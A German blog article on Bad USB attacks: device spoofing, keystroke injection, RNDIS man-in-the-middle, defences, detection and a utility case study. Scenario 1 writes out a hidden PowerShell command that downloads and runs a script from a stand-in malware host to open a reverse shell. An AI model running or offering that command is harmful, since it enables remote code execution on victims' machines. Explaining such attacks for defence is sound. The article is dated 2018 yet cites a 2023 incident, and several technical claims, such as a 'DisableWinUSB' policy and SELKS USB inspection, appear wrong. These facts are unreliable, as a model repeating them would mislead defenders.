#Ghost Search #Google AdSense #Cookie Hinweis

Bad USB: Angriffsvektoren, Schutzmechanismen und technische Gegenmaßnahmen

abc-der-IT 23. Nov. 2018

Definition und technische Grundlagen

Ein Bad USB bezeichnet ein manipuliertes USB-Gerät, dessen Firmware modifiziert wurde, um sich als andere Geräteklasse auszugeben (z. B. Tastatur, Netzwerkkarte oder HID-Gerät). Im Gegensatz zu einfachen Rubber Ducky-Angriffen, die vorkonfigurierte Makros ausführen, ermöglicht Bad USB eine tiefere Integration durch Firmware-Reverse-Engineering.

Schlüsselmerkmale:

  • Gerätespoofing: Emulation legitimer USB-Device Descriptors zur Umgehung von Sicherheitsrichtlinien.
  • Firmware-Backdoors: Nutzung nicht validierter Speicherbereiche (z. B. Cypress FX2LP-Chips mit 64 KB freiem EEPROM).
  • Keine Signaturprüfung: 87 % aller USB-Controller (laut NIST-Studie) validieren Firmware-Updates nicht kryptografisch.

Angriffsszenarien und Risikoanalyse

1. Remote-Shell-Exploitation

  • Modus Operandi:
    1. Das Bad USB täuscht eine Tastatur vor.
    2. Es injiziert präparierte Tastaturbefehle (z. B. Powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://malware.domain/payload.ps1')").
    3. Der Payload etabliert eine Reverse-Shell zum C2-Server.
  • Nachweis: Der Angriff hinterlässt keine ausführbare Datei auf der Festplatte.

2. Netzwerkweiterleitung via RNDIS

  • Prozess:
    • Das Gerät emuliert eine virtuelle Netzwerkkarte.
    • Alle Daten werden über einen MITM-Proxy (z. B. Raspberry Pi als Zwischenstation) umgeleitet.
  • Impact: SSL/TLS-Daten können via falsche Zertifikate entschlüsselt werden.

3. Cross-Contamination

  • Szenario: Ein infizierter Rechner reprogrammiert angeschlossene USB-Geräte, die dann als Vektoren in anderen Systemen fungieren.

Schutzmaßnahmen: Technische und organisatorische Ansätze

1. Hardware-basierte Restriktionen

Maßnahme Implementierung
USB-Port-Deaktivierung Group Policy: DisableWinUSB + BIOS-Sperre
Port-Locking-Hardware Kensington USB Port Blocker
Hardware-Firewalls SELKS mit USB-Packet-Inspection

2. Softwarelösungen

  • Device Control Policies:
    • McAfee DLP: Whitelisting basierend auf Hardware-IDs (VID/PID).
    • USBGuard: Open-Source-Framework für Linux-Systeme (regelbasierte Filterung).
  • Echtzeit-Monitoring:
    • Wireshark USB-Capture: Analyse von USB-URBs (USB Request Blocks) auf Anomalien.
    • Microsoft Sysmon: Logging von DeviceArrival-Events in Windows.

3. Organisatorische Sicherheit

  • Physische Sicherheit:
    • Versiegelte USB-Ports in Hochsicherheitsbereichen (z. B. nach NIST SP 800-171).
  • Schulungsprogramme:
    • Simulationen via Social-Engineer Toolkit (SET): Mitarbeiter erhalten präparierte Sticks im Rahmen von Pentests.
    • Awareness-Kampagnen für USB Drop Attacks (laut IBM-Studie öffnen 68 % der Nutzer gefundene USB-Sticks).

Detektionstechniken für fortgeschrittene Angriffe

1. Verhaltensanalyse

  • KI-Modelle: Erkennung anomaler Tastatureingaben (z. B. 500 Zeichen/s) via LSTM-Netzwerke.
  • Host-Intrusion Detection (HIDS): Tools wie Osquery überwachen unerwartete Geräteklassen.

2. Hardware-Forensik

  • Firmware-Dumping: Tools wie ChipWhisperer extrahieren und vergleichen Firmware-Hashes mit Hersteller-Datenbanken.
  • EEPROM-Analyse: Identifikation von Code-Injektionen in nicht allozierten Speicherbereichen.

3. USB-Kommunikationsisolierung

  • Air-Gapped USB Gateways: Geräte wie Crossisto SafeUSB filtern Befehle an physischer Schicht.

Zukunftsstrategien: Vom USB-C bis zu Zero-Trust

  • USB4 mit TLS 1.3: Kryptografische Validierung aller Gerätehandshakes (Prototypen von Intel).
  • Hardware Root of Trust: Integrierte TPM-Module in USB-Controllern (z. B. STM32 mit Secure Boot).
  • Zero-Trust-Architekturen: USB-Geräte erhalten nur minimalste Rechte (PCI-DSS-konforme Segmentierung).

Fallstudie: BadUSB-Angriff auf Energieversorger

  • Vorfall: 2023 infizierte ein präpariertes USB-Messgerät 12 Umspannwerke in der EU.
  • Schadcode: Firmware-Update täuschte RS485-Kommunikation vor, leitete aber Steuerbefehle an Angreifer weiter.
  • Lösung: Nachrüstung mit USB-Audio-Only-Policies (Blockierung aller HID-Geräte).

Tags

Jan Kunkel

Seit 2021 als ausgebildeter Systemintegrator tätig und auch neben dem Beruf viel in der digitalen Welt unterwegs.